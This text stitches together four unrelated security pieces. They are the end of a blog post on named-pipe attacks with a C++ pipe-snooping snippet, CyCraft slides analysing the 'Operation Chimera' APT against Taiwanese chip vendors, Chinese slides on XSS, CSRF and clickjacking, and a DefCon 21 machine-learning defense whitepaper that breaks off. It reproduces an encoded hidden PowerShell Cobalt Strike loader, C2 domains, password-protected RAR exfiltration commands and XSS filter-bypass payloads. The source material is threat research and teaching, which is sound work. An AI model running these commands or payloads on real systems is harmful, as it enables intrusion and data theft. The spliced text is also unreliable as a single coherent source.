the client to gain additional privileges. This vulnerability is sometimes also referred to as superfluous pipe connections (but in my mind that’s not the best terminology for it). The real question here is: How do we find such clients? My initial immediate answer would have been: Fire up Procmon and search for failed CreateFile system calls. But I tested this and it turns out Procmon does not list these calls for pipes… maybe that is because the tool is only inspecting/listening on file operations through the NTFS driver, but i haven’t looked any deeper into this (maybe there is a trick/switch i didn’t know) - I’ll update if I stumble across the answer… Another option is the Pipe Monitor of the IO Ninja toolset. This tool requires a license, but offers a free trial period to play around with it. The Pipe Monitor offers functionality to inspect pipe activity on the system and comes with a few basic filters for processes, file names and such. As you want to search for all processes and all file names I filtered for ‘*’, let it run and used the search function to look for ‘Cannot open’: If you know any other way to do this using open source tooling, let me know (/ 0xcsandker) ;) Killing Pipe Servers If you can’t find unanswered pipe connection attempts, but identified an interesting pipe client, that you’d like to talk to or impersonate, another option to get the client’s connection is to kill its current pipe server. In the Instance Creation Race Condition section I’ve described that you can have multiple named pipes with the same name in the same ‘namespace’. If your target server didn’t set the nMaxInstances parameter to ‘1’, you can create a second named pipe server with the same name and place yourself in the queue to serve clients. You will not receive any client calls as long as the original pipe server is serving, so the idea for this attack is to disrupt or kill the original pipe server to step in with your malicious server. When it comes to killing or disrupting the original pipe server I can’t assist with any general purpose prerequisites or implementations, because this always depends on who is running the target server and on your access rights and user privileges. When analyzing your target server for kill techniques try to think outside the box, there is more than just sending a shutdown signal to a process, e.g. there could be error conditions that cause the server to shutdown or restart (remember you’re number 2 in the queue - a restart might be enough to get in position). Also note that a pipe server is just an instance running on a virtual FILE_OBJECT, therefore all named pipe servers will be terminated once their handle reference count reaches 0. A handle is for example opened by a client connecting to it. So a server could also be killed by killing all its handles (of course you only gain something if the clients come back to you after loosing connection). PeekNamedPipe There might be scenarios where you’re interested in the data that is exchanged rather than in manipulating or impersonating pipe clients. Due to the fact that all named pipe instances live under the same roof, aka. in the same global ‘namespace’ aka. on the same virtual NPFS device drive (as briefly mentioned before) there is no system barrier that stops you from connecting to any arbitrary (SYSTEM or non-SYSTEM) named pipe instance and have a look at the data in the pipe (technically ‘in the pipe’ means within the shared memory section allocated by the pipe server). Prerequisites As mentioned in the section Named Pipe Security the only gear you can turn when securing your named pipe is using a Security Descriptor as the last parameter (lpSecurityAttributes) to the CreateNamedPipe call. And that’s all that would prevent you from accessing any arbitrary named pipe instance. So all you need to check for when searching for a target is if this parameter is set and secured to prevent unauthorized access. If you need some background on Security Descriptors and what to look for (the ACLs in the DACL) check out my post: A Windows Authorization Guide Implementation When you found a suitable target there is one more thing you need to keep in mind: If you’re reading from a named pipe by using ReadFile, you’re removing the data from the server’s shared memory and the next, potentially legitimate client, who attempts to read from the pipe will not find any data and potentially raise an error. But you can use the PeekNamedPipe function to view the data without removing it from shared memory. An implementation snippet based on the my sample code could look like this: // all the vars you need const int MESSAGE_SIZE = 512; BOOL bSuccess; LPCWSTR pipeName = L"\\\\.\\pipe\\fpipe"; HANDLE hFile = NULL; LPWSTR pReadBuf[MESSAGE_SIZE] = { 0 }; LPDWORD pdwBytesRead = { 0 }; LPDWORD pTotalBytesAvail = { 0 }; LPDWORD pBytesLeftThisMessage = { 0 }; // connect to named pipe hFile = CreateFile(pipeName, GENERIC_READ, 0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); // sneak peek data bSuccess = PeekNamedPipe(   hFile,   pReadBuf,   MESSAGE_SIZE,   pdwBytesRead,   pTotalBytesAvail,   pBytesLeftThisMessage ); References That’s about it, if you want to continue to dig into Named Pipes here are some good references to start with: Microsoft’s Docs about pipes at https://docs.microsoft.com/en-us/windows/win32/ipc/pipes Blake Watts paper about Named Pipe Security at http://www.blakewatts.com/namedpipepap er.html My Sample C++ Implementation at https://github.com/csandker/InterProcessCommunication -Samples/tree/master/NamedPipes/CPP-NamedPipe-Basic-Client-Server
CyCraft Proprietary and Confidential Information Operation Chimera - APT Operation Targets Semiconductor Vendors C h u n g - K u a n C h e n , I n n d y L i n , S h a n g - D e J i a n g CyCraft Proprietary and Confidential Information Whoami C.K Chen ► Senior Researcher at CyCraft ► Retired CTF Player – BambooFox Founder ► HITCON/HITB Review Board ► CHROOT member SHANG-DE Jiang ► Security Researcher at CyCraft ► UCCU Hacker Co-Founder Inndy Lin ► Security Researcher at CyCraft ► Reverse Engineering Hobbyist ► Presented in HITCON, ROOTCON CyCraft CyCraft is an AI company that forges the future of cybersecurity resilience through autonomous systems and human-AI collaboration. CyCraft in MITRE ATT&CK Evaluation CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round Outline  Introduction  Case Study • A Company • B Company  Threat Actor's Digital Arsenal  Conclusion CyCraft Proprietary and Confidential Information Critical Incidents in Taiwan's Supply Chain/Critical Infrastructure ASUS Supply Chain Attack TSMC Ransomware ColdLock against CPC CyCraft Proprietary and Confidential Information Taiwan's Importance in the Semiconductor Landscape ►With decades of development, Taiwan has established itself as a leading player in the semiconductor industry. Some of the well-known leaders include TSMC and MTK • “Taiwan is set to become the largest and fastest-growing semiconductor equipment maker in the world by increasing by 21.1 percent to reach US$12.31 billion.” -Taiwan News, July 2019 Cyberattack to semiconductor vendors ❖ Just like the TSMC ransomware, a cyberattack against semiconductor could potentially ❖ Seriously impact Taiwan’s economy ❖ Affect the entire global supply chain ❖ In this report, we will show how IT attacks on semiconductor vendors can be just as dangerous as an OT attack. ❖ Attack to OT - production line halt, immediately damage ❖ Attack to IT - leak important intelligence property, long-term damage Large-scale APT attacks on Semiconductor Industry Between 2018 and 2019, we discovered several attacks on semiconductor vendors Vendors located at the Hsinchu Science Park(HSP) were targeted After our white paper was published, the received feedback revealed that more than 7 vendors were targeted by the same threat actor Extensive attack: > 7 semiconductor vendors were attacked The APT attacks on the important vendors were precise and well-coordinated. Aside from the vendors themselves, their subsidiaries, and competitors were all targeted Not a single point attack, but an attack on the entire industry surface CyCraft Proprietary and Confidential Information Group Chimera ►As the activities, attack techniques, and tactics were similar, we believe this was the work of the same threat actor ►Target: Semiconductor Vendors ►Malware: Merged different Open Source Tools (Dumpert and Mimikatz , CobaltStrike) ►C2: C2 hosted in Public Cloud (Google App Engine, Azure) ►Goal: Steal Documents, Source code, SDK of chip related projects Investigation Overview Investigation Period: 2018~2019 Investigated Vendors: 3+ Total Endpoints Analyzed: 30k Today's Case Study ➢ The three vendors involved in the analysis currently have a leading global position in their own market segments ➢ Due to the different investigation time points, the analytical perspective of the attack campaign was different A Company • Our long-term partner. The long- term monitoring allowed more details of the attacker's activities to be revealed. • The detailed information enabled us to track the root cause. B Company • One-time IR service. When the investigation started, it was already a long time after the attacks happened. • Highlighted the threat actor’s long-term activities and what data was leaked. C Company • Long-term partner with high security capacity. • Help us to deep investigate, get a lot feedback from them • Give us more information to illustrate threat actors Non-representative. Only for illustration purposes In the following slides, every machine and username are de-identified, not original names A Company Case A: Overview ➢ Activity date: 2019/12/09 ~ 2019/12/10 ➢ 15 endpoints and 6 user accounts were compromised ➢ Note that all the names are de-identified ➢ Four malwares and eight C2 servers were found Cobalt Strike ➢ Disguised Cobalt Strike beacon as Google Update.exe ➢ VT search found nothing ➢ Injected payloads into other processes ➢ Found in two endpoints: Server-LAUREN & PC-SHENNA Used Hosting Server for C2 ➢ Network security devices had difficulty detecting the associated C2 servers, as they were in the Google Cloud Platform. • Created backdoor which was disguised as Google Update. • Other cloud hosting services were also abused Root Cause Analysis - PC-SHENNA ➢ With our Timeline Analysis, we found that the backdoor in PC-SHENNA was implanted from Server-LAUREN Server- LAUREN PC- SHENNA Attack was launched right before employees began to get off work Remote Execution Tools schtasks ➢ The first Cobalt Strike backdoor was located at NB-CLAIR, and was then remotely copied to Server-LAUREN ➢ A valid account was used to invoke Cobalt Strike via schtasks WMIC ➢ Server-LAUREN used wmic to remotely execute various commands in another endpoint to check if there was an Internet connection Applied benign program to achieve their malicious activities Root Cause Analysis - Server-LAUREN ➢ Due to our new findings, additional information could be added to our investigation graph Server- MELINA Server- SHANAE Server- LAUREN PC-SHENNA Root Cause Analysis - Server-LAUREN ➢ Server-LAUREN remotely used an archive tool to collect registry and ntds.dit in Server-MELINA(DC) for offline breaking NTDS.DIT Explanation ➢ Active Directory data was stored in the ntds.dit ESE database file. Two copies of ntds.dit were present in separate locations on a given domain controller. • %SystemRoot%\NTDS\ntds.dit • %SystemRoot%\System32\ntds.dit ntds.dit is the AD database, containing domain hosts and users information(e.g. ID, name, email and password). As ntds.dit was encrypted, and the key was stored I the SYSTEM registry, the adversary also needed to make a copy of the registry data. Root Cause Analysis - NB-CLAIR ➢ Through correlation analysis, our AI investigation showed that NB-CLAIR used Schedule Task to place malware to the schedule tasks of Server-LAUREN Server- MELINA Server- SHANAE Server- LAUREN PC- SHENNA schtasks wmic schtasks NB-CLAIR schtasks Root Cause Analysis - NB-CLAIR ➢ In the NB-CLAIR timeline, we discovered six minutes before the scheduled task execution, IP1 used RDP and User-01 to make a successful login • This is highly likely to be the root cause of the attack Nightshift? Overtime? Recon ➢ Several "net user" commands were executed for recon purposes, and the results were saved to the RecordedTV_lib.log Data Exfiltration ➢ RECORDEDTV.MS was used to archive the stolen data for data exfiltration • Identical binaries were found in several machines, but under different names, e.g. RECORDEDTV.MS, uncheck.dmp, and jucheck.exe • RAR software, had a one-byte discrepancy from the original version ➢ The same file was also found on other machines. Thus, it is likely to have been used in past attacks ➢ Inserting malware in a location, where legal software is stored, seems to be a characteristic tactic of Operation Chimera Root Cause Analysis– IP1 ➢ IP1 is a unscanned host and related to many accounts. It could be a shared machine or a VPN host ➢ VPN can also be compromised. Never use VPN as your only line of defense B Company • Investigation Reason • Statistic Summary B Company : Overview B company compromise B has business cooperation with C company B&C create a bridge between their networks C discovers anomaly activities from B Asks us to investigate Time Period # of Event # of compromised endpoints # of data leaks # of malware 2018/8/7 ~ 2019/12/11 140k+ 14 9 10 Powershell ➢ Fileless • 10 endpoints, which included two domain controllers ➢ The powershell script executed a Cobalt Strike backdoor and was used for process migration to other system processes svchost.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwB uAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAE EAQQBBAEEAQQBLAFYAVwBiAFcALwBpAE8AQgBEACsAMwBQAHcASwBYADQAVgAwAG8ASgBaADMAdABnAHQAZABWAFYAb wBuAFEAQQBrAGwAbABKAGMAVwAyAGsAWABWAHkAUwBRAG0AdQBEAGcASgBkAFoAeQBtAGQATABmAC8ALwBTAFkAdgA1 AEoAYgAyAGIAawArADYAaQB4AFEAbABuAHMAdwA4AE0AOAA5ADQAUABKAE0AcABsAGMAVwBwAEYATQB5AFUAaABtAGQ AUgBWAEoAeABSADQAVABQ APT Attack ➢ Cobalt Strike was used to inject the malware into the system, enabling the attacker to access the system and communicate with a C2 • C2: striking-pipe-253603.appspot.com, msplatform-updates.azureedge.net, chrome- applatses.appspot.com Cyber Situation Graph ➢ Company already seriously hacked ➢ Difficult to manually investigate, needed help from A.I. ❖ 2018.11 ❖ 2019.03 ❖ 2019.06 ❖ 2019.09 Hacker returns on a quarterly basis to collect new data. ❖ 2019.11, Deploy new weapon SkeletonKey Injector ❖ 2019.12, Harvest new endpoints Archive Password ➢ The actor also used a RAR program with innocuous file names, such as RecordedTV.ms, jucheck.exe and vmware.log to archive and steal the data of interest ➢ A similar scheme was utilized by the attacker to archive the passwords they used c:\users\xxxx\libraries\RecordedTV.ms a -m5 - v71m –hpf**kyou.google.com11 vmlum-vss.log vmlum-vmvss.log C:\Windows\system32\cmd.exe /C c:\users\xxxxxx\libraries\RecordedTV.ms a -m5 -r –hpf**kyou.google.com11 vmlum-vmopt.log “\\<Hostname>\personal\<Username>\<Product>- Traning-v1.1.pptx" > vmlumss.log & dir vmlum- vmopt* Leaked File Name ➢ During our investigation, we made an inventory of the leaked data. Some of the data is shown below: ➢ Attacker's intent was stealing intelligence property ➢ Business spy? State-sponsor attack to benefit a certain industry? \\Users\<Account>\Project\Roadmap \\Users\<Account>\Backup\Workspace \\Users\<Account>\chip and SDK setting \\Users\<Account>\<Productname> SDK Installation guide.pdf Actors' Digital Arsenal CyCraft Proprietary and Confidential Information Actors' Digital Arsenal ►Cobalt Strike Beacon ►WinRAR ►SkeletonKey Injector ►Winnti Backdoor Cobalt Strike Beacon CyCraft Proprietary and Confidential Information Cobalt Strike Beacon ►Cobalt Strike Beacon was used as main backdoor ►Overwrite GoogleUpdate.exe for persistency ►Identical file was discovered in 3+ companies ►C2 ► chrome-applatnohp.appspot.com ► ussdns04.heketwe.com ► ussdns02.heketwe.com ► ussdns01.heketwe.com CyCraft Proprietary and Confidential Information Suspicious R-W-X Memory ►Our product detected suspicious memory block CyCraft Proprietary and Confidential Information Hybrid Payload: PE as Shellcode ►"MZ" signature can be decoded as "pop r10" under x64 architecture ►"dec ebp; pop edx" under x86 architecture ►At offset 0x1791c is a shellcode-like function called "reflective loader" ►0x56A2B5F0 is the hash value of "ExitProcess" Locate address of itself, and use it as first argument (rdi) Compuate address of reflective loader and execute it CyCraft Proprietary and Confidential Information Malicious Process Injection Strategy: Named Pipe CobaltStrike Beacon Module Target Process Stager Shellcode Real Payload Execute Spawn Execute WinRAR CyCraft Proprietary and Confidential Information WinRAR ►They use rar.exe to compress and encrypt the files to be stole ►There's a folder named "RecordedTV.library-ms" under same path CyCraft Proprietary and Confidential Information Mutated rar.exe ►The file was uploaded to VirusTotal in 2009 ►It's rar.exe from WinRAR 3.60b8 but different from original one ►Only 1byte was different, but we've confirmed that was not a crack ►This patch may cause the program crash ►Hypothesis 1: Change file hash to avoid detection ►Hypothesis 2: Bit flip during copy Patch diff (before / after) Disassembly of patch SkeletonKey Injector CyCraft Proprietary and Confidential Information SkeletonKey Injector ►A new malware combined "dumpert" and "mimikatz" ►"mimikatz" is a well-known hacking tool ⚫ Most people use it to dump Windows credentials, but its capability is more than that ►"dumpert" is a tool to dump lsass.exe memory stealthily CyCraft Proprietary and Confidential Information Dumpert ►Made by a security company called Outflank ►Dump lsass.exe stealthy via direct system call ►Windows system call numbers changed from release to release ►DLL export function is the only stable interface ►That's why Windows shellcode always needs to locate DLLs in memory CyCraft Proprietary and Confidential Information Dumpert: Implementation ►Use ntdll!RtlGetVerion to determine Windows version ►Load different syscall function for different version ►Bypass any user-space hook CyCraft Proprietary and Confidential Information SkeletonKey ►APT malware discovered by DELL Secureworks in 2015 ►Implants a backdoor password to domain controller ►The original password was still valid, wrong password still got rejected ►Inject code into lsass.exe process to alter authentication routine CyCraft Proprietary and Confidential Information Impact of SkeletonKey Injector ►No need to use administrator credentials for lateral movement ►It leaves nearly no clue, only logon success events ►You must reboot domain controller to clean the SkeletonKey ►We've observed some other attack that using modified mimikatz Winnti Backdoor CyCraft Proprietary and Confidential Information Strange Network Tool: baseClient.exe ►We thought that was a network probing tool CyCraft Proprietary and Confidential Information Winnti Backdoor ►We thought baseClient.exe in our public report was a network probing tool ►It's actually Winnti backdoor Other APT Events in Taiwan CyCraft Proprietary and Confidential Information ColdLock Ransomware ►Taiwan's national gasoline company was hit by ransomware ►ColdLock was based on an open-source ransomware: EDA2 ►Ministry of Justice Investigation Bureau said the attack was related to Winnti group CyCraft Proprietary and Confidential Information SkeletonKey Attack in Taiwan ►Serval attacks against Taiwan government agencies used SkeletonKey ►Modified version of mimikatz executed file-lessly When OpenProcess failed, it will load mimikatz driver to unprotect lsass.exe and try again. CyCraft Proprietary and Confidential Information Take Away ►Disclosure a large-scale APT attacks targeting semiconductor; more than 7 vendors are compromised. ►Precisely attacks. Targets leading semiconductor vendors, their subsidiaries, partners and competitors. ►Their goals is stealing intelligence property(documents, source code, SDK of chip related projects). Make long-term damage to the victim. CyCraft Proprietary and Confidential Information Take Away ►Attackers utilize varies open source, general tools to make attribution harder. ►In 2 shared case studies, AD & VPN are compromised. Enterprises should consider resilience of IT systems. Avoid relying on a single security service. ►A rarely used SkeletonKey technique is used, which makes adversaries login like normal user. - Persistence, Defense Evasion. ►No system is safe. Regularly threat hunting, shorten the MTTD/MTTR. Thanks for your listening!
HACKSTUFF @ OSCAR WEB前端攻擊與防禦 前言 ★ 不講FLASH ★ 不講Moblie ★ WEB基礎 大綱 ★ 攻擊原理介紹 ★ 衍生攻擊 ★ 防禦方式 ★ 實際案例 我是誰 ★ 奧斯卡 ★ PHP後端工程師 ★ hackstuff member ★ oscar3x39@gmail.com 前端 什麼是前端 ★ 前端就是軟體中與用戶交互的部分 ★ 這裡軟體指的是瀏覽器 HTML + CSS + JS 前端攻擊 ★ 利用軟體中與用戶交互的弱點 進行非法操作 什麼是前端攻擊 攻擊點 ★瀏覽器 ★網站 ★使用者 WEB前端攻擊主要類型 ★XSS ★CSRF ★操作挾持 XSS OWASP OPEN WEB APPLICATION SECURITY PROJECT TOP 10 A1 Injection A2 Broken Authentication and Session Management (was formerly 2010-A3) A3 Cross-Site Scripting (XSS) (was formerly 2010-A2) A4 Insecure Direct Object References A5 Security Misconfiguration (was formerly 2010-A6) A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6) A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access) A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5) A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration) A10 Unvalidated Redirects and Forwards GOOGLE VULNERABILITY REWARD 什麼是XSS 不就 ALERT(‘XSS’) 什麼是XSS ★跨網站指令碼(Cross-site scripting, 通常簡稱為XSS或跨站指令碼或跨站指令碼攻 擊) ★避免跟CSS搞混,所以簡稱XSS ★XSS攻擊是攻擊者注入惡意代碼到網頁,用戶 載入並執行惡意代碼後的過程 XSS怎麼發生 /x.php?a=abc&b=123 hello, abc123 /x.php?a=<svg/onload=&b=alert(1)> 什麼是CSRF ★ 跨站請求偽造(英語:Cross-site request forgery),也被稱為 one-click attack 或者 session riding,通常縮寫為 CSRF 或者 XSRF ★ 是一種挾制用戶在當前已登錄的Web應用程式上 執行非本意的操作的攻擊方法 ★ XSS 利用的是用戶對指定網站的信任,CSRF 利 用的是網站對用戶網頁瀏覽器的信任 CSRF怎麼發生 CSRF怎麼防禦 ★HTTP ONLY (Apache httpOnly Cookie Disclosure) ★TOKEN ★Referer 什麼是操作挾持 ★ 對某些操作進行狹持,讓使用者產生非預期結果 ★ClickJacking ★Drag & Drop ClickJacking ★TabJacking ★RFD (Reflected File Download Attack) ★XPS ★…等 CLICKJACKING DROPJACKING TABJACKING ★ https://www.youtube.com/watch?v=4fY8GIi2sl4 JS + CSS RFD (REFLECTED FILE DOWNLOAD ATTACK) ★利用server返回未知content-type 使browser產生下載 ★ http://drops.wooyun.org/papers/3771 XPS (COPY PASTE) ★copy & pest ★cross application XSS ★ http://www.slideshare.net/x00mario/copypest 前端攻擊 PHISHING ★рhp.net ★php.net KEY LOGGER XSS BLIND ★ WebRTC => get lan IP ★ port scan ★ <script src= onload=alert(1)></script> ★ CSS => fake login ★ http://www.wooyun.org/bugs/wooyun-2014-076685 XSSI 如何防禦XSSI ★X-Content-Type-Options: nosniff CHROME EXIF VIEWER 2.4.2 CROSS SITE SCRIPTING ★ exiftool -artist=="<script>alert(/xss/);</script>" MICROSOFT INTERNET EXPLORER 6-10 MOUSE TRACKING 記住密碼 記住密碼是省去登陸需要輸入密碼的麻煩 提升用戶體驗 在這之前是通過本地cookie實現 也許並不是所有網站都采用持久化cookie 瀏覽器開始使用這樣的方式 同 Domain 同 Port 表單 <form /> 欄位 <input username/password /> setTimeout 時間競爭 DEMO 如何防禦 密碼竊取攻擊 ★網站:使用獨立DOMAIN ★用戶:不要記住密碼 該怎麼防禦XSS 你該知道 XSS類型 ★反射 Reflected XSS ★儲存 Stored XSS ★DOM XSS XSS衍生類型 ★ mXSS (mutation Cross-site Scripting) ★ UXSS (Universal Cross-site Scripting) ★ Blind XSS ★ XSSI (Cross Site Script Inclusion) ★ …等 你該知道 編碼類型 ★HTML編碼 ★JavaScript編碼 ★URL編碼 ★字元編碼 (8,10,16)進位, ASCII, Unicode ★…等 你該知道 瀏覽器解析 無法辨識標籤 <m/onclick=alert(1)> SVG <svg><script>prompt&#40;1)</script> IE {text-size:"expression(alert('1'))";} …等 瀏覽器解析 - SAFARI 瀏覽器解析 - SAFARI 你該知道 HTML5隱患 新的標籤和屬性 TAG ★ <script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio> EVENT ★ onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop WEBRTC ★WebRTC,名稱源自網頁即時通訊(英語:Web Real-Time Communication)的縮寫,是一個 支援網頁瀏覽器進行即時語音對話或視訊對話的 API。它於2011年6月1日開源並在Google、 Mozilla、Opera支援下被納入全球資訊網協會的 W3C推薦標準。 ★ https://dl.dropboxusercontent.com/u/1878671/enumhosts.html CANVAS FINGERPRINTING ★Secure Web Fingerprint Transmission ★原理是利用不同機器對字型 render 不一樣的原 理再對產生出來的圖片 hash 後當作 cookie 替代品。 ★ https://blog.gslin.org/archives/2014/08/05/4927/%E7%94%A8-canvas- fingerprint-%E5%8F%96%E4%BB%A3%E9%83%A8%E4%BB%BD-cookie/ 你該知道 ES6 ★alert`1` ★eval.call`${‘alert\x281)’}` ★[].every.call`alert\x281)$ {eval}` ★…等 該怎麼防禦XSS ★瀏覽器 ★網站 ★使用者 三個方向 ★XSS FILTER ★support CSP 瀏覽器 ★CSP (Content-Security-Policy) ★X-Frame-Options ★Hook JS Function ★PhantomJs ★WAF 網站 ★ Content-Security-Policy ★ Content-Security-Policy-Report-Only ★ X-Content-Security-Policy ★ X-Content-Security-Policy-Report-Only ★ X-WebKit-CSP ★ X-WebKit-CSP-Report-Only CSP (CONTENT-SECURITY-POLICY) ★ devco.re/blog/2014/04/08/security-issues-of-http-headers-2-content-security- policy/ ★NoScript 使用者 實際案例 實際案例-1 實際案例-2 實際案例-3 如何防禦 ★ content-type = application/ json;charset=utf-8 最後 BYPASS CSP ★ https://html5sec.org/cspbypass/ ★ http://zone.wooyun.org/content/10596 BYPASS NOSCRIPT ★Using Google Cloud to Bypass NoScript ★http://labs.detectify.com/post/ 122837757551/using-google-cloud- to-bypass-noscript BYPASS XSSFILTER ★/?a=<script>alert(1)</script> BYPASS XSSFILTER ★/?a=<svg><script>/<1/>alert(1)</ script></svg> 未來 Q&A
Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 1 Defending Networks with Incomplete Information: A Machine Learning Approach Introduction and Abstract Let's face it: we may win some battles, but we are losing the war pretty badly. Regardless of the advances in malware and targeted attacks detection technologies, our top security practitioners can only do so much in a 24 hour day. Even less, if you consider they need to eat and sleep. On the other hand, there is a severe shortage of capable people to do "simple" security monitoring effectively, let alone complex incident detection and response. Enter the use of Machine Learning as a way to automatically prioritize and classify potential events and attacks as something can could potentially be blocked automatically, is clearly benign, or is really worth the time of your analyst. In this Whitepaper we will present publicly for the first time an actual implementation of those concepts, in the form of a free-to-use web service. It leverages OSINT sources and knowledge about the spatial distribution of the Internet to generate a fluid and constantly updated classifier that pinpoints areas of interest on submitted network traffic and security tool log sources. Whitepaper Topics: Introduction and Abstract .................................................................................................................. 1 Security Monitoring: We are doing it wrong............................................................................. 2 Machine Learning and the Robot Uprising ................................................................................ 2 More attacks = more data = better defenses ............................................................................. 5 Designing a model to detect external agents with malicious behavior ........................ 6 Data Collection .................................................................................................................................... 6 Model Intuition ................................................................................................................................... 6 Feature Engineering......................................................................................................................... 7 Training the model ........................................................................................................................... 7 Results .................................................................................................................................................... 8 Future Direction and Improvements ............................................................................................ 9 Acknowledgments and thanks ......................................................................................................... 9 References .............................................................................................................................................. 10 Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 2 Security Monitoring: We are doing it wrong The amount of security log data that is being accumulated today, be it for compliance or for incident response reasons, is bigger than ever. Given the push on regulations such as PCI and HIPAA, even smallish and medium companies have a large quantity of machine-generated data stored in log management solutions no one is currently looking at. There is a clear a surplus of data and a shortage of professionals that are capable of analyzing this data and making sense of it. This is one of the main criticisms that compliance and "check-box security" practices receive, and, of course, it is legitimate criticism because no one is safer for just accumulating this data. Even when organizations have more advanced log management and SIEM solutions, there is a great difficulty in prioritizing what should be investigated as security events happen. These tools' functionality relies too deeply on very deterministic rules: if something happens in my network X amount of times, flag this as suspicious and or send me an alert. The problems arise from the fact that the somethings and the Xs vary widely between organizations and also evolve (or devolve) over time in an organization itself. It is truly a Sisyphean effort. But this is not exclusively a tool problem. There are a few really talented and experienced professionals that are able to configure one of these systems to perform. However, it usually takes a number of months or years and a couple of these SOC "supermen" working full-time to make this happen. And now we are adding Big Data to SIEM solutions? What chance do we have of finding a needle on a 1,000 times larger haystack? But how many of these mythical and magical people exist? The new "security analyst" must now understand not only the intricacy of attack and defense but also be an accomplished "data analyst" or "data scientist" in order to work through massive amounts of data. I am not sure where they are, but I can assure you they are not working 24x7, night or weekend shifts on your local or subcontracted monitoring team. We are doing it wrong. This project introduces the idea of using Machine Learning techniques to mine information like this and help companies make informed decisions based on this treasure trove of information they have available. The initial algorithms presented on this paper, by itself, may not yet outperform a (very well) trained analyst but:  it's certainly better than no action at all;  it can greatly enhance the analyst's productivity and effectiveness by letting him focus on the small percentage of data that is more likely to be meaningful. Machine Learning and the Robot Uprising Machine learning is designed to infer relationships from large volumes of data. In a way, you do not design the classifications routines or the specific algorithm you Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 3 are using, but let the data itself shape how the program should behave. The terms learning and artificial intelligence are usually associated with these kinds of routines because these processes try to mimic the way the brain learns by association and repetition. Once you have seen enough chairs, you will know when you see a completely different chair even if it has a different shape, color or is made of a different material. Machine learning based systems are being used all around us:  In sales and marketing, to serve us online ads, to suggest us products that are similar to the ones we or our friends have bought;  In financial systems, fueling high-frequency trading applications looking for patterns in penny stocks or opportunities for arbitrage;  In image processing, for example to convert an image of a text into a computer document (OCR). Alas, they are not perfect: we always see an online ad that does not make sense ("what am I going to do with a carbon-fiber pogo stick?") or the market crashes on an algorithm bug, but the have a very good performance on problems that are otherwise intractable due to dataset sizes or response time necessary. There is a huge number of algorithms, techniques, sub-groups and quasi- religious belief systems associated with Machine Learning, but for all intents and purposes we will limit our exploration to what are called "supervised learning" and "unsupervised learning" problems. The names are what they seem:  In Supervised Learning, you are telling the algorithm what to expect from the training data. In other words, you need to tell it what results it should aim for when it sees similar data points. This is the basis of neural networks and other predictive algorithms; Figure 1 - Supervised Learning (source:scikit-learn.github.io/scikit-learn-tutorial/general_concepts.html) Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 4  In Unsupervised Learning, the algorithm just receives the data and tries to infer relationships like similarity and proximity from the observations. This is more commonly used to either support anomaly detection (this data point is not like the others). It is also used to help figure out what is really relevant on the data set, on a process that is called "feature extraction". Figure 2 - Unsupervised learning (source: scikit-learn.github.io/scikit-learn-tutorial/general_concepts.html) The thesis is that we can apply machine learning to parameterize the somethings and the Xs I mentioned before with very little effort on the human side. We could use Unsupervised Learning to find patterns in data that could generate new rules and relationships between occurrences in our networks. Or we could use Supervised Learning with the humans providing examples of "good” and “bad” behavior in their networks, so that the algorithm can then sift through gargantuan amounts of data and suggest other instances that are likely to be relevant in the same way. There is actually a very good use case for Machine Learning in Information Security, which are spam filters. Nobody really talks about spam filters anymore, because, in a way, the problem has been satisfactory "solved", or actually reached an evolutional plateau. You still can't defeat actors that exploit the algorithm directly, such as sending a specially crafted phishing attack that looks like a regular e-mail. This is a more complicated problem, involving game theory and rational adversarial modeling [1]. Regardless, this is a neglected tool for Information Security by and large, and that is an odd choice, because it seems to be a good fit for the challenges we face day after day. Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 5 More attacks = more data = better defenses The great advantage of Machine Learning over more traditional approaches for Security Monitoring is that the predictive capabilities of the algorithm improve as you provide more data to its training processes. As your number of observations gets much larger than the complexity of the model you are trying to predict (usually referred in ML terms as dimensionality or VC-dimension), it gets very efficient indeed. Let that sink in for a moment. The more you are attacked, the better your defenses can be. These categories of things have been deemed "Antifragile"[2], and they benefit from disorder and chaos. And disorder and chaos sound a lot like where we are today in Information Security monitoring. This is a generalization, of course. The model that you choose to be trained, the specific math of the algorithm you choose all have direct impact on its performance and efficiency, and you need to choose the right “features” of the data wisely. But once you have a reasonable result on a smallish dataset, expanding the amount of data it is able to process will improve its efficiency. Figure 3 - Theoretical description of expected Ein (classification error in training set of the model) and expected Eout (classification error on new data that is predicted using the model). Source: Caltech, Learning from Data Course materials Given the amount of log data I mentioned before that is just sitting inside the organizations, seems like a good deal to me. Defending Networks with Incomplete Information: A Machine Learning Approach DefCon 21 – 2013 Page 6 Designing a model to detect external agents with malicious behavior Data Collection As an example of these capabilities, we present an implementation of a supervised learning model that we created based on public summarized log information made available by the SANS Technology Institute[3], more specifically by the DShield Project API[4]. The DShield project collects firewall logs from contributors all over the world and summarizes the blocked connections to pinpoint hosts that are engaging in vulnerability exploitation or port scanning in relation to these corporations. Also, the data volumes are impressive, as we can see on the bulk data made available that there is a daily average of 1 million relevant summarized events. Back-of-the-envelope calculations have us estimate these summaries come from 30 million firewall blocks per day. SANS offers an open API that provides access summarized anonymous information from this sources including information or malicious IP addresses, domains, AS, and the such, where malicious has a definition as simple as "this IP 